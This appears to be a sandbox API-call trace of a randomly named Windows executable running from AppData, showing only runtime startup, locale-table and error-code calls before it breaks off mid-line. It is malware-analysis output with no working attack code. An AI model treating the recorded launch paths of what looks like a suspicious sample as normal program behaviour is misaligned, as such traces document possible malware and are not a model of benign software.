GetCurrentThreadId () returned 0xba8 [0097.425] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x13807d0)) [0097.425] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0097.425] GetFileType (hFile=0x3) returned 0x0 [0097.425] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0097.425] GetFileType (hFile=0x7) returned 0x0 [0097.425] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0097.425] GetFileType (hFile=0xb) returned 0x0 [0097.425] SetHandleCount (uNumber=0x20) returned 0x20 [0097.425] GetCommandLineA () 
returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0097.425] GetEnvironmentStringsW () returned 0x16fd70* [0097.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0097.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x13811f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0097.426] FreeEnvironmentStringsW (penv=0x16fd70) returned 1 [0097.426] GetLastError () returned 0x6 [0097.426] SetLastError (dwErrCode=0x6) [0097.426] GetLastError () returned 0x6 [0097.426] SetLastError (dwErrCode=0x6) [0097.426] GetLastError () returned 0x6 [0097.426] SetLastError (dwErrCode=0x6) [0097.426] GetACP () returned 0x4e4 [0097.426] GetLastError () returned 0x6 [0097.426] SetLastError (dwErrCode=0x6) [0097.426] IsValidCodePage (CodePage=0x4e4) returned 1 [0097.426] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0097.426] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0097.426] GetLastError () returned 0x6 [0097.426] SetLastError (dwErrCode=0x6) [0097.426] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0097.427] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0097.427] GetLastError () returned 0x6 [0097.427] SetLastError (dwErrCode=0x6) [0097.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿਘശAĀ") returned 256 [0097.427] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 
!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿਘശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0097.427] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿਘശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0097.427] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x5a\xe8\xeb\xef\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0097.427] GetLastError () returned 0x6 [0097.427] SetLastError (dwErrCode=0x6) [0097.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0097.427] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿਘശAĀ") returned 256 [0097.427] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿਘശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0097.427] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿਘശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0097.428] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x0
5\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf
9\xfa\xfb\xfc\xfd\xfe\xff\x5a\xe8\xeb\xef\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0097.428] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe")) returned 0x36 [0097.428] GetLastError () returned 0x0 [0097.428] SetLastError (dwErrCode=0x0) [0097.428] GetLastError () returned 0x0 [0097.428] SetLastError (dwErrCode=0x0) [0097.428] GetLastError () returned 0x0 [0097.428] SetLastError (dwErrCode=0x0) [0097.428] GetLastError () returned 0x0 [0097.428] SetLastError (dwErrCode=0x0) [0097.428] GetLastError () returned 0x0 [0097.428] SetLastError (dwErrCode=0x0) [0097.428] GetLastError () returned 0x0 [0097.428] SetLastError (dwErrCode=0x0) [0097.428] GetLastError () returned 0x0 [0097.428] SetLastError (dwErrCode=0x0) [0097.428] GetLastError () returned 0x0 [0097.428] SetLastError (dwErrCode=0x0) [0097.428] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.429] SetLastError (dwErrCode=0x0) [0097.429] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] 
SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.430] GetLastError () returned 0x0 [0097.430] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.431] SetLastError (dwErrCode=0x0) [0097.431] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] 
SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.432] GetLastError () returned 0x0 [0097.432] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 